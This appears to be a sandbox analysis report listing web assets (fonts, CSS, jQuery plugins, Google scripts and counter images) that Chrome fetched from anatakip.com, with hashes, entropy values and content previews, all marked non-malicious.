                    SHA-512:B2EAD3410DEA89B658BFB0CE67842569641CD6C29889ECFB223A83637600B82B0D2E55CEC26750593359663A22896F5DA91D3DF9F085C204803CD646A7CABC28
                    Malicious:false
                    Reputation:low
                    URL:https://www.gstatic.com/recaptcha/releases/joHA60MeME-PNviL59xVH9zs/recaptcha__en.js
                    Preview:(function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/./*.. Copyright 2005, 2007 Bob Ippolito. All Rights Reserved.. Copyright The Closure Library Authors.. SPDX-License-Identifier: MIT.*/./*.. SPDX-License-Identifier: Apache-2.0.*/./*. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/./*.. Apache License. Version 2.0, January 2004. https://www.apache.org/licenses/.. TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION.. 1. Definitions... "License" shall mean the terms and conditions for use, reproduction,. and distribution as defined by Sections 1 through 9 of this document... "Licensor" shall mean the copyright owner or entity authorized by. the copyright owner that is granting the License... "Legal Entity" shall mean the union of the acting entity and all. other entities that contro
                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                    File Type:Web Open Font Format (Version 2), TrueType, length 71896, version 4.393
                    Category:downloaded
                    Size (bytes):71896
                    Entropy (8bit):7.996746194687547
                    Encrypted:true
                    SSDEEP:1536:tA4xrPyfyECsyz2wCjYfhO/ORzc7erabg5Z06GEQMo:t3jayEC/2/OI/gcq+bg5C6G7
                    MD5:E6CF7C6EC7C2D6F670AE9D762604CB0B
                    SHA1:97E438CC545714309882FBCEADBF344FCADDCEC5
                    SHA-256:7DACF83F51179DE8D7980A513E67AB3A08F2C6272BB5946DF8FD77C0D1763B73
                    SHA-512:DD945FACE918EDF20B7283B7416AE7B3735269945E3F3E379E770425024C1DE1FCDC7CFB952381D295D0D1F58C8AB191FD29030F2051D10501557BD7BFBE3658
                    Malicious:false
                    Reputation:low
                    URL:https://anatakip.com/assets/fonts/fontawesome-webfont.woff2?v=4.6.3
                    Preview:wOF2..............T....y........................?FFTM.. .`........P..K.6.$........ ..|..L?webf.[8....m;.t.........c6.....>.S.8.{...]?....?=i..%...P......f85J.0..u....f...eB.\...E.l.....Aw..6...f..F...0l...M.`;i.O.U....k."=........./6../eX.q..vf{].-.o,.5.&.}.L..:...0.{.e..V*3~....1Mh.M4:9jG..B......K...Y..2c.=..@..V*+..=.g.;..%.q,..sYF.oj..D..t....wZ1t.S\...L.....k(...1CK.z.Z!.iM....zH.....D[gcN........E.~.j.VD..[../..TD..........<@.j.cl...}.s.g4...F.f.F..;...H...E...P.#I..1{..X....]..ps.........^(.S........N...1S.....$@..T.\..k"G". V.Z..gf?.{..D..8f............9....g.i.\..... .".u^.+....%...u.S...!.J.Y5.{k..j..J.....i....!..t."...v...C..0...p..as..g.3.....~3/.3.<s.....K...u..t.n.......tS.|..].~..I* ...I......7y..EL@.B.%....TTT.zu\.....eb.bM..-f.?.... .Os$/.Y....u..7..F.Q5.F..........%.......b`...o....o....c...t..@7.*.{HK...P..9..(.*[..&&..{...W.0e.....8.v.h.a..-..%./..wgg.|.\E.x.^;H...D..(.J&......D.mo}..0.i...g#.i{....4.3f.;.m.......v{GbP...T.
                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                    File Type:PNG image data, 81 x 29, 8-bit colormap, non-interlaced
                    Category:downloaded
                    Size (bytes):1652
                    Entropy (8bit):7.7505351705166525
                    Encrypted:false
                    SSDEEP:24:nV4Pq59mpnjcJAXN9KOBuoovSzIv6INOHkasxK+G+87ome9bIBbRpv7:VCjc+9vgrvMH0xK+GSmedIBvv7
                    MD5:FC582BA2D77271C25054900D467B0A82
                    SHA1:A6CB08EF0BEE8116EE6EB0245A0B364BD4BE925F
                    SHA-256:39D8071186F5B2A2065D43D0A565BA5AAF2B869D47F8617AB58E19D01EA9803F
                    SHA-512:EE84C61C097699BADB0BCE1F8FC00B785D53B14337CBC23D1D282B877AA761B4DB9168DC203CACC6B6B9648D39B9B79B1B948A17C5AE781C00E1DCCFFAA36E95
                    Malicious:false
                    Reputation:low
                    URL:https://widgets.amung.us/classic/14/1454.png
                    Preview:.PNG........IHDR...Q...........p.....PLTE.................}}}www.........ttt............................zzz.........vvvrrr......................................ppp........\\\(((...555.'-...000......EEE888...---AAAQQQ===}'*h$'XXX.&,.7;.7;RJJ.#'.&+[!$.\_.&,S..2. .'+W=>333fNO9%&kKLNFF.UX .EJ.UY.',$$$.QU2((.KNJAAZZZ.MP{%(.KO...^...EI....@DN')|KM.IL= !&&&~'+.UY;()<<<eVVN()...9...IM. $.JKMMM222y\].IM:'(:::.KO. $.KM.',J89VNN_FF....@E.'+,"#k.!...s. ..........#(F==,,,...$...RT.QU&...&,nnnS89xxx.EH@@@rJKX.!.\a....<@`&(.IL~NP^^^.<Akkk...J#%___.\^.QUeee///...E().@FOOO+++(..lVV.VW>>>lAC...111TTTcccbbbSSSmmmUUU...PPP.!&.',IIIaaar\]WWWBBB.&+LLLGGG.'-CCCggg.%*ddd```]]]YYY.7<999fff???hhh.@F.<B.EJ.QV.\`.UY.IN.KP.MRjjj[[[KKK"""VVV'''...JJJNNN%%%...RRRFFF...eZ......tRNS.@..f...OIDATH....w.U....".P(*e.Z......6 .B.QQ.w@..e_d.AY.T.E.ZqA.me+..n.,mCKK:.....d23a.?...$9.4.B.9'....9...I&..B......^G..b.b..r.0.....-l..b/O?3....V.4...[}.p1....@qcZ...0*.[..._%&.Lo...k...J}......Y..d...B..u.8..BV-~
                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                    File Type:ASCII text, with very long lines (28900), with CRLF line terminators
                    Category:downloaded
                    Size (bytes):29067
                    Entropy (8bit):4.756576399136628
                    Encrypted:false
                    SSDEEP:384:1u5yWeTUKW+KlkJ5de2UYDyVfwYUas8l8yQ/8dwwdZ:ulr+Klk3Yi+fwYUf8l8yQ/eV
                    MD5:FEA395DB9A5C8EABA924D98161324597
                    SHA1:3C1D63DD1176C77F9F4CDB1616FBB08C31B9822F
                    SHA-256:ED0F05101D480726C58BCD4956A1E7B02F12B538D02058F1B0EBFDABE8A7EF42
                    SHA-512:8B1378CAE4D1B877EF6B74F5649B487785E2EF4DA32AD93ACC96100BCD546551FCB814086B0E4179E87E2370DD67457CFBA7D2F1D664BC347470A94600EED019
                    Malicious:false
                    Reputation:low
                    URL:https://anatakip.com/assets/style/font-awesome.min.css
                    Preview:/*!.. * Font Awesome 4.6.3 by @davegandy - http://fontawesome.io - @fontawesome.. * License - http://fontawesome.io/license (Font: SIL OFL 1.1, CSS: MIT License).. */@font-face{font-family:'FontAwesome';src:url('../fonts/fontawesome-webfont.eot?v=4.6.3');src:url('../fonts/fontawesome-webfont.eot?#iefix&v=4.6.3') format('embedded-opentype'),url('../fonts/fontawesome-webfont.woff2?v=4.6.3') format('woff2'),url('../fonts/fontawesome-webfont.woff?v=4.6.3') format('woff'),url('../fonts/fontawesome-webfont.ttf?v=4.6.3') format('truetype'),url('../fonts/fontawesome-webfont.svg?v=4.6.3#fontawesomeregular') format('svg');font-weight:normal;font-style:normal}.fa{display:inline-block;font:normal normal normal 14px/1 FontAwesome;font-size:inherit;text-rendering:auto;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale}.fa-lg{font-size:1.33333333em;line-height:.75em;vertical-align:-15%}.fa-2x{font-size:2em}.fa-3x{font-size:3em}.fa-4x{font-size:4em}.fa-5x{font-size:5em}.fa-fw{width
                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                    File Type:ASCII text, with very long lines (17141), with no line terminators
                    Category:downloaded
                    Size (bytes):17141
                    Entropy (8bit):5.011599839675867
                    Encrypted:false
                    SSDEEP:384:97c/sJIPkzMzMzizBSctxMLvd5eUwUaBB/X5KdJG28l4ZtBo5vHz:mwITMk
                    MD5:36CB8DB2FED5DA1BE11EEAB404EDCB42
                    SHA1:2F7C4C01DE4516F921892D9DBF8E65F936E7F06F
                    SHA-256:684F62821435E980A9E73DB15F0B99081BCB5316F1CBDFCCCE5493B131F5E91A
                    SHA-512:617C1E2DE373E930D6F9DE17416DE052CF76EE6123B59D3C3E05AE1CFE317C950CA036937CA3515AE60C4D627C34BDFF8B92CD56DAFD7371851816230A091F4A
                    Malicious:false
                    Reputation:low
                    URL:https://anatakip.com/assets/lightgallery/dist/css/lightgallery.min.css
                    Preview:.lg-sub-html,.lg-toolbar{background-color:rgba(0,0,0,.45)}#lg-counter,.lg-outer .lg-video-cont{vertical-align:middle;display:inline-block}@font-face{font-family:lg;src:url(../fonts/lg.eot?n1z373);src:url(../fonts/lg.eot?#iefixn1z373) format("embedded-opentype"),url(../fonts/lg.woff?n1z373) format("woff"),url(../fonts/lg.ttf?n1z373) format("truetype"),url(../fonts/lg.svg?n1z373#lg) format("svg");font-weight:400;font-style:normal}.lg-icon{font-family:lg;speak:none;font-style:normal;font-weight:400;font-variant:normal;text-transform:none;line-height:1;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale}.lg-actions .lg-next,.lg-actions .lg-prev{background-color:rgba(0,0,0,.45);border-radius:2px;color:#999;cursor:pointer;display:block;font-size:22px;margin-top:-10px;padding:8px 10px 9px;position:absolute;top:50%;z-index:1080}.lg-actions .lg-next.disabled,.lg-actions .lg-prev.disabled{pointer-events:none;opacity:.5}.lg-actions .lg-next:hover,.lg-actions .lg-prev:hover{color:
                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                    File Type:ASCII text, with very long lines (5945)
                    Category:downloaded
                    Size (bytes):291780
                    Entropy (8bit):5.5731226798032
                    Encrypted:false
                    SSDEEP:3072:CC4lgdc0Iard8OdwDMYba8KqCKqjysCBIQ+9agdDBqzGmRmFHxK6+0H54OroD5+N:n4ab8OdwDM/9z1zQ+9fdDBqzGan0+Ox
                    MD5:29BD09C55BEC8C20B798B209642D0E29
                    SHA1:27DA671AC831C651D7EEA50FD6BA86214E295373
                    SHA-256:82808BCDE48390B82F3C2B21A6C363B9B6219F28F4B69A802716D590C0AA7B29
                    SHA-512:EA7B00CB7C52C6C5CB42253922759D2E1916DB55ACB0BEA74453D4B81F63A68EAAA1487DBADB80E76E21753CE3B368273F00DEFB997618401373521A1F2EE98F
                    Malicious:false
                    Reputation:low
                    URL:https://www.googletagmanager.com/gtag/js?id=G-T1K5FR27Q6
                    Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"1",. . "macros":[{"function":"__e"},{"vtp_signal":0,"function":"__c","vtp_value":0},{"function":"__c","vtp_value":""},{"function":"__c","vtp_value":0},{"vtp_signal":0,"function":"__c","vtp_value":0},{"function":"__c","vtp_value":""},{"function":"__c","vtp_value":0}],. "tags":[{"function":"__ogt_1p_data_v2","priority":13,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR","vtp_cityValue":"","vtp_emailType":"CSS_SELECTOR","vtp_regionType":"CSS_SELECTOR","vtp_autoEmailEnabled":true,"vtp_postalCodeValue":"","vtp_lastNameValue":"","vtp_phoneType":"CSS_SELECTOR","vtp_phoneValue":"","vtp_streetType":"CSS_SELECTOR","vtp_autoPhoneEnabled":false,"vtp_postalCodeType":"CSS_SELECTOR","vtp_email
                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                    File Type:PNG image data, 81 x 29, 8-bit colormap, non-interlaced
                    Category:dropped
                    Size (bytes):1724
                    Entropy (8bit):7.76828347703023
                    Encrypted:false
                    SSDEEP:24:Kls4mpnjcJAXN9KOBuoovSzIv6IOzBQErYeHRVaspP0+3cpT9VeADt2IhFZ:Kejc+9vgrveB9Haspt3cpTL3rZ
                    MD5:875A879394AB551FB693A7285CC2CAAB
                    SHA1:08046991ED14417EA19F8E1DD86F77F76FA1A04D
                    SHA-256:0AD94F487C69F50B650697576DA54A9E56F374915F209DE2F98416169E90AEFD
                    SHA-512:C72C21F4493262AC49B07337F87C8FBC08D9032BB99A4330092FDEE1F4CDAC2DD088DC8E21F168618BAD004A4B3F06EDF615415C96BDE2B273C6CA0F745A6A2D
                    Malicious:false
                    Reputation:low
                    Preview:.PNG........IHDR...Q...........p.....PLTE..........................................}}}zzz.............................www.....ttt..........vvvrrr......................................ppp........\\\(((...555.'-...000......EEE888...---AAAQQQ===}'*h$'XXX.&,.7;.7;RJJ.#'.&+[!$.\_.&,S..2. .'+W=>333fNO9%&kKLNFF.UX .EJ.UY.',$$$.QU2((.KNJAAZZZ.MP{%(.KO...^...EI....@DN')|KM.IL= !&&&~'+.UY;()<<<eVVN()...9...IM. $.JKMMM222y\].IM:'(:::.KO. $.KM.',J89VNN_FF....@E.'+,"#k.!...s. ..........#(F==,,,...$...RT.QU&...&,nnnS89xxx.EH@@@rJKX.!.\a....<@`&(.IL~NP^^^.<Akkk...J#%___.\^.QUeee///...E().@FOOO+++(..lVV.VW>>>lAC...111TTTcccbbbSSSmmmUUU...PPP.!&.',IIIaaar\]WWWBBB.&+LLLGGG.'-CCCggg.%*ddd```]]]YYY.7<999fff???hhh.@F.<B.EJ.QV.\`.UY.IN.KP.MRjjj[[[KKK"""VVV'''...JJJNNN%%%...RRRFFF....0......tRNS.@..f....IDATH...it.U....le... J[dI...m.3mD,. ..(........"..(... .#....--...*.%o:I&L..}.M*......$.....99.d.!....*RC....~....>..;.=w..G.......i.m{.7U.H...t`.H.<~..//q..(9T...>..'..}~C..#.\..?.m..A
                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                    File Type:ASCII text, with very long lines (15424), with no line terminators
                    Category:downloaded
                    Size (bytes):15424
                    Entropy (8bit):5.082181791901702
                    Encrypted:false
                    SSDEEP:192:NL6gqmAAa2CFqPCaYSBP558oKppsY+88ZlZl0P7MNCD/bKDk1dFpxY:NBchqPCVP7CCk
                    MD5:74C1738CBFBC4B6C65BF13C138FAD889
                    SHA1:9610E924981DCB97E79A26977574C47A0B63B42A
                    SHA-256:06F82690D3FF8A42627C0B5CFD1919D3717D7BA416FD21D20B7A08F189393B29
                    SHA-512:FC951178E6861EB8BACA1326F9686EE0FB96A1C0A4E22B938F85AA93904C9CD588FAEF5100B21C23CD6DB555EAE928FD0B88C047CAD1760860AC215072A424B4
                    Malicious:false
                    Reputation:low
                    URL:https://anatakip.com/assets/style/paper.css?v=v3.1.5
                    Preview:body{padding-top:64px}*:focus,*:active{outline:none!important}bodylogged{padding-top:108px}.navbar-collapse{clear:both!important}.nav>li>a{padding:10px}@media(min-width:768px){.navbar-collapse{clear:none!important}}@media(max-width:767px){.navbar-nav .open .dropdown-menu{position:absolute;top:100%;left:0;z-index:1000;float:right;min-width:160px;padding:5px 0;margin:2px 0 0;list-style:none;font-size:13px;text-align:left;background-color:#fff;border:1px solid #ccc;border:1px solid rgba(0,0,0,.15);border-radius:3px;-webkit-box-shadow:0 6px 12px rgba(0,0,0,.175);box-shadow:0 6px 12px rgba(0,0,0,.175);-webkit-background-clip:padding-box;background-clip:padding-box}}textarea,textarea.form-control,input.form-control,input[type=text],input[type=password],input[type=email],input[type=number],[type=text].form-control,[type=password].form-control,[type=email].form-control,[type=tel].form-control,[contenteditable].form-control,select,select.form-control{border:1px solid #ddd;padding-left:5px}label
                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                    File Type:Web Open Font Format (Version 2), TrueType, length 11872, version 1.0
                    Category:downloaded
                    Size (bytes):11872
                    Entropy (8bit):7.984513670899152
                    Encrypted:false
                    SSDEEP:192:x3+bgMXrMANDJau6ZEYUprldNZR5grT0UfYKznkdXwbVBeM/w/ZMfx5:xOlgAbzHnaDfbYdXwbXePZax5
                    MD5:87ACE20058325AA069320AA4AF875DFF
                    SHA1:B743548770C46D905AE1BA06310BC001C587FE8E
                    SHA-256:3C23EB02DE6B34E30F18CFB7167ABD81A2CEDFD1DA60DFCB71989517AB3FB431
                    SHA-512:A662BE567067CC2C3667768796AFB3F2D8A9288F41516E522E8637E3F45FB485F9E65A2BA069EB8CF5DCEE0342F5D6410026EC41652FA2DF280CB03F062DC2D3
                    Malicious:false
                    Reputation:low
                    URL:https://fonts.gstatic.com/s/roboto/v30/KFOmCnqEu92Fr1Mu7GxKOzY.woff2
                    Preview:wOF2.......`......s,..-..........................@.....0.`....T..<.....$..B..z.....6.$..p. ..t. ..I..g%l.F..<...m..I{T".`. @......d..:cj.~.D..a;.2..M...2..*[x..L..-mioQ(..V..|y.F....)...~T.....[..........m....}h/...%..$h...n.b.......$....W=]=.... .s.J......;......I..T.x|uta|..6..V.......X.8]Z.Q3........9...).....D...=...........~..E..8...x..y..2....^y.....sP..Z.$.~.h.!J.......W].+v.Nqf'^N`.x.xd....p.......m;...........o...l.p........E......Q..X.=..^R..l....v.]...pH....sxtR........q....0.......L..B..t...B.c..7..)......%...+.e:.3._..{...V......@A..A....v4..woi}W.'X.I..{.#...(.|b..#......9w..A.$r..D...A..S....7$..H-.....e.)......O2.w..!.1<.$..[:....:zt....\.._.e...3..h..B.......1}...m.n3.(..>.DL.....Gh}0..S.>...N g. O~.........t.b.]....I...yZjt..<;"..4Ag..J.. fN.}g.....f/.B.6.,..6,.l..Z....SQk.o.....1...\...v-;F..7|U.....g............y..s\.M.U...%g.4.....'..q...Yo(l..X.)...Z.:S....lo...`..t.t.Ty..X........dY.F.V.MI.Fr..fq.l.^y.5...B.BR....
                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                    File Type:ASCII text, with very long lines (20453)
                    Category:downloaded
                    Size (bytes):23090
                    Entropy (8bit):5.3606235674532074
                    Encrypted:false
                    SSDEEP:384:DNLkhMitHmwVDJmKbuTcdYxHz5hYF/5xQLSTp2SW5YJ3uSh:DNoLtHmwyouTcdYxHz5hY95OCQK3uSh
                    MD5:AD662C23460B39E23220A4C9C7F98F70
                    SHA1:83B39265CEAE8A9C40757EF5AE05011AC3646FD4
                    SHA-256:CFAC49BEC33974B027F5E08C4A7E40A76DCA5D3D855B5D260C6EB2E9BDD67E9E
                    SHA-512:935612D9890500DA91769A9F9564AC49DEF599AD00AC06B4B6DD6FF9A4038C7426E290564D1575937367111337F3932351BD97D6E0093F24FE7F072B3925812F
                    Malicious:false
                    Reputation:low
                    URL:https://anatakip.com/assets/scripts/fancybox/source/jquery.fancybox.pack.js
                    Preview:/*!fancyBox v2.1.5 fancyapps.com | fancyapps.com/fancybox/#license*/(function(r,G,f,v){var J=f("html"),n=f(r),p=f(G),b=f.fancybox=function(){b.open.apply(this,arguments)},I=navigator.userAgent.match(/msie/i),B=null,s=G.createTouch!==v,t=function(a){return a&&a.hasOwnProperty&&a instanceof f},q=function(a){return a&&"string"===f.type(a)},E=function(a){return q(a)&&0<a.indexOf("%")},l=function(a,d){var e=parseInt(a,10)||0;d&&E(a)&&(e*=b.getViewport()[d]/100);return Math.ceil(e)},w=function(a,b){return l(a,b)+"px"};f.extend(b,{version:"2.1.5",defaults:{padding:15,margin:20,width:800,height:600,minWidth:100,minHeight:100,maxWidth:9999,maxHeight:9999,pixelRatio:1,autoSize:!0,autoHeight:!1,autoWidth:!1,autoResize:!0,autoCenter:!s,fitToView:!0,aspectRatio:!1,topRatio:0.5,leftRatio:0.5,scrolling:"auto",wrapCSS:"",arrows:!0,closeBtn:!0,closeClick:!1,nextClick:!1,mouseWheel:!0,autoPlay:!1,playSpeed:3E3,preload:3,modal:!1,loop:!0,ajax:{dataType:"html",headers:{"X-fancyBox":!0}},iframe:{scrolling:
                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                    File Type:PNG image data, 81 x 29, 8-bit colormap, non-interlaced
                    Category:dropped
                    Size (bytes):1602
                    Entropy (8bit):7.7376153993316406
                    Encrypted:false
                    SSDEEP:24:t4Pq59mpnjcJAXN9KOBuoovSzIv6IodWxH3Dnv0HgRLmRrlUIe1akhe4ezKNk:tCjc+9vgrv9HzvdUq89Ku
                    MD5:A6E4998ADC6A55CD174CDF065C3B0612
                    SHA1:26566DCF0C11CDD37C2600D56F6C47DA8645B26E
                    SHA-256:AC83CA01D4943F69B3E5080B09B71C926311459A12E5838FE78CA53079BF84EA
                    SHA-512:95881037343C0DEDB1D60465D58544BA9366D9B6BB52EF6C5FDB70189F2A1CBE8C2110C057DDDF2ECEF626664EE0C4B11A6128A55271830B22E70711599EB237
                    Malicious:false
                    Reputation:low
                    Preview:.PNG........IHDR...Q...........p.....PLTE..........www.......ttt............................zzz.........vvvrrr......................................ppp........\\\(((...555.'-...000......EEE888...---AAAQQQ===}'*h$'XXX.&,.7;.7;RJJ.#'.&+[!$.\_.&,S..2. .'+W=>333fNO9%&kKLNFF.UX .EJ.UY.',$$$.QU2((.KNJAAZZZ.MP{%(.KO...^...EI....@DN')|KM.IL= !&&&~'+.UY;()<<<eVVN()...9...IM. $.JKMMM222y\].IM:'(:::.KO. $.KM.',J89VNN_FF....@E.'+,"#k.!...s. ..........#(F==,,,...$...RT.QU&...&,nnnS89xxx.EH@@@rJKX.!.\a....<@`&(.IL~NP^^^.<Akkk...J#%___.\^.QUeee///...E().@FOOO+++(..lVV.VW>>>lAC...111TTTcccbbbSSSmmmUUU...PPP.!&.',IIIaaar\]WWWBBB.&+LLLGGG.'-CCCggg.%*ddd```]]]YYY.7<999fff???hhh.@F.<B.EJ.QV.\`.UY.IN.KP.MRjjj[[[KKK"""VVV'''...JJJNNN%%%...RRRFFF....{sU....tRNS.@..f...)IDATH....S.A...U...n.b.E^.bC#..{...{.5b.w..D........b......r!~..f...777...B.fJ....u....!..@.....0....-.c..,..../g..6szj.@._6...'...y..(.b.a.v.@.?.S.O3>...Xj....b...Qv......q..$v..D6.0..lK.%.H.\.5.l.^o.._..^/...{%|C.
                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                    File Type:PNG image data, 81 x 29, 8-bit colormap, non-interlaced
                    Category:downloaded
                    Size (bytes):1692
                    Entropy (8bit):7.7866711327533125
                    Encrypted:false
                    SSDEEP:24:yLs4Pq59mpnjcJAXN9KOBuoovSzIv6ILxcZ3/Cgvpc+xVvKpVAfQdGCSFtdHsXTc:usCjc+9vgrvy+sv4qfQ8Bd8c
                    MD5:4DC8DCC5B21E31C390804369F2B24929
                    SHA1:BC488B251ABB5120A3B94602B2345E9222A12F30
                    SHA-256:8B68A0258EB964A2268E37A17F1175BF73ED0C26C070C1FDF24E9EA884FAD059
                    SHA-512:DDC7D6A4C2CCB13963EBDE879737A6854475B3FA98A5B7B5170911D614CAACDEAD2BB6D126DADFF161363C211131C6EFED84D4A8E71463F5B29AC07B86E73E61
                    Malicious:false
                    Reputation:low
                    URL:https://widgets.amung.us/classic/14/1402.png
                    Preview:.PNG........IHDR...Q...........p.....PLTE................................ttt............................zzz.........vvvrrr......................................ppp........\\\(((...555.'-...000......EEE888...---AAAQQQ===}'*h$'XXX.&,.7;.7;RJJ.#'.&+[!$.\_.&,S..2. .'+W=>333fNO9%&kKLNFF.UX .EJ.UY.',$$$.QU2((.KNJAAZZZ.MP{%(.KO...^...EI....@DN')|KM.IL= !&&&~'+.UY;()<<<eVVN()...9...IM. $.JKMMM222y\].IM:'(:::.KO. $.KM.',J89VNN_FF....@E.'+,"#k.!...s. ..........#(F==,,,...$...RT.QU&...&,nnnS89xxx.EH@@@rJKX.!.\a....<@`&(.IL~NP^^^.<Akkk...J#%___.\^.QUeee///...E().@FOOO+++(..lVV.VW>>>lAC...111TTTcccbbbSSSmmmUUU...PPP.!&.',IIIaaar\]WWWBBB.&+LLLGGG.'-CCCggg.%*ddd```]]]YYY.7<999fff???hhh.@F.<B.EJ.QV.\`.UY.IN.KP.MRjjj[[[KKK"""VVV'''...JJJNNN%%%...RRRFFF..........tRNS.@..f...wIDATH....w.U...P(..@.i.....f.Z.....;.........(...*(......{...L,-.X.&...?.....4%.b.9'.~.}s...I&C.!A../..j......xT.......%...t......p....T...[.'Ul{<A..D. u.(...9..y..D.6.6.i.5R}..../.........M..:..7......
                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                    File Type:ASCII text, with very long lines (22367), with no line terminators
                    Category:downloaded
                    Size (bytes):22367
                    Entropy (8bit):5.542626302580642
                    Encrypted:false
                    SSDEEP:384:gM78SUevMTjuFzouWaqWAlpTpdHjPtcnG:p7oevMX5HjPwG
                    MD5:B0B46B807EEE39AF0AAD8F5FEFC9B3A2
                    SHA1:0FB04F15599BC0844063A6AB776C86E73CB9FBFC
                    SHA-256:71CA2652E2B3FFD3C0EC966958604714CE6C7AF01D961B44ADC438518EB58CB3
                    SHA-512:4EEC49904A5480940124A1C1B9C9DAE764EBB115829CBCE4356E66A1D7F077DFD204A4634B0622FFB14CC6EBFF7062D7F30502BF0BC7D998A1A55FC8C876DA8E
                    Malicious:false
                    Reputation:low
                    URL:https://www.gstatic.com/_/translate_http/_/ss/k=translate_http.tr.26tY-h6gH9w.L.W.O/am=AgM/d=0/rs=AN8SPfrixlL1amy8r1f0UQHcZ2HL9amUjg/m=el_main_css
                    Preview:.VIpgJd-ZVi9od-ORHb-OEVmcd{left:0;top:0;height:39px;width:100%;z-index:10000001;position:fixed;border:none;border-bottom:1px solid #6B90DA;margin:0;box-shadow:0 0 8px 1px #999}.VIpgJd-ZVi9od-xl07Ob-OEVmcd{z-index:10000002;border:none;position:fixed;box-shadow:0 3px 8px 2px #999}.VIpgJd-ZVi9od-SmfZ-OEVmcd{z-index:10000000;border:none;margin:0}.goog-te-gadget{font-family:arial;font-size:11px;color:#666;white-space:nowrap}.goog-te-gadget img{vertical-align:middle;border:none}.goog-te-gadget-simple{background-color:#FFF;border-left:1px solid #D5D5D5;border-top:1px solid #9B9B9B;border-bottom:1px solid #E8E8E8;border-right:1px solid #D5D5D5;font-size:10pt;display:inline-block;padding-top:1px;padding-bottom:2px;cursor:pointer}.goog-te-gadget-icon{margin-left:2px;margin-right:2px;width:19px;height:19px;border:none;vertical-align:middle}.goog-te-combo{margin-left:4px;margin-right:4px;vertical-align:baseline}.goog-te-gadget .goog-te-combo{margin:4px 0}.VIpgJd-ZVi9od-l4eHX-hSRGPd,.VIpgJd-ZVi9od-
                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                    File Type:Web Open Font Format (Version 2), TrueType, length 15740, version 1.0
                    Category:downloaded
                    Size (bytes):15740
                    Entropy (8bit):7.9866977438851
                    Encrypted:false
                    SSDEEP:384:RRlYHoE1mbF2cZgh17dAdJ0mB1cpOxvLTcZjh1LOz:JYIB2Sg/dYui1XBHwG
                    MD5:B9C29351C46F3E8C8631C4002457F48A
                    SHA1:E57E59C5780995FF2937AB2B511A769212974A87
                    SHA-256:F75911313E1C7802C23345AB57E754D87801581706780C993FB23FF4E0FE62EF
                    SHA-512:487AC3FD483F8EA131989857BCF1782C295AC72022BC2EBD4BF19001433D6DB65000E192E58B7A6F70F627D15C58F9FED9BA5FE0216363354BEC5A396299DAD9
                    Malicious:false
                    Reputation:low
                    URL:https://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmSU5fBBc4.woff2
                    Preview:wOF2......=|.......l..=..........................d..d..^.`.. .X..<.....x..s........6.$.... ..|. ..:.(..l.V38.......;..'....F.........)..!B..V..U......;..q....O#..cx..mt.w[.......x.UG|n}........]k[....;J.....<=..F.$'/.......w...r$`....b(g..9C4....#.BK..G..9".Q...ld...j..C.l.F.i#.+.UO...%.E.Z..C..."......k1._....M.Y....-..H......Gm3.....YiJ.s..b..>..W..U.."..2..-.O........(H...0$....7l.7}.j...".C...w?/.oB%<K..d...'H....M]...k.."...E_k.............8.\...A.1U.9 5.@Jb.)J....Hkb ....!.n._.s.:5E......k..}.^...7]f.,a.7..a.H...J^.~...uWJ),....Z.7A..Ra:..k...}.R.*...G k$.{...%...R...."X6...A......p..V..IH[... .m..H.q.x.?|......b.#:.c..Z.V.}..:P$j..c..B..^...HH......?......=.#^ q.@R...I....#.$O.H.N03~.@`...........8e.......>!...d..I.........g<)2......P....u..V.........c.1sK.."G.#...^;....=w....[G.}k.y.?.........c.a..\9f..zx..("mGj.."...d..........>c.!..Z.xm...=....v.V..:.6s.....J.oz#.....Y"d.....6>1...i...IQ*..;2......\d......n..y....K..Y.L...O.2.....
                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                    File Type:PNG image data, 81 x 29, 8-bit colormap, non-interlaced
                    Category:dropped
                    Size (bytes):1509
                    Entropy (8bit):7.732240525400323
                    Encrypted:false
                    SSDEEP:24:VT2QQnjcJAXN9KOBuoovSzIv6IVxjOtvQYJXVZ7IWSdcbT2cqEMRUAUnkrL4oxMj:R2vjc+9vgrvmtvQ+776d4T2xUApfzx0T
                    MD5:E51DB1800E42FA0F270AB8C26D110DCA
                    SHA1:7726BBCC5ECF5E3795B5789F9E525675E85C6A5D
                    SHA-256:774F3F1C24589B3B75D12CE84A8C65E8E2E59097D388CD109A80BDA44FE459FA
                    SHA-512:C96EB8D26333FD74E9988BB2250908D0DB19FEEFA01F1E7F89EB0CFC906BF235403114B4A29FF1C1A7F5549FCB4345CFEAAAB6DD821CB73F37703B1201FAFE6E
                    Malicious:false
                    Reputation:low
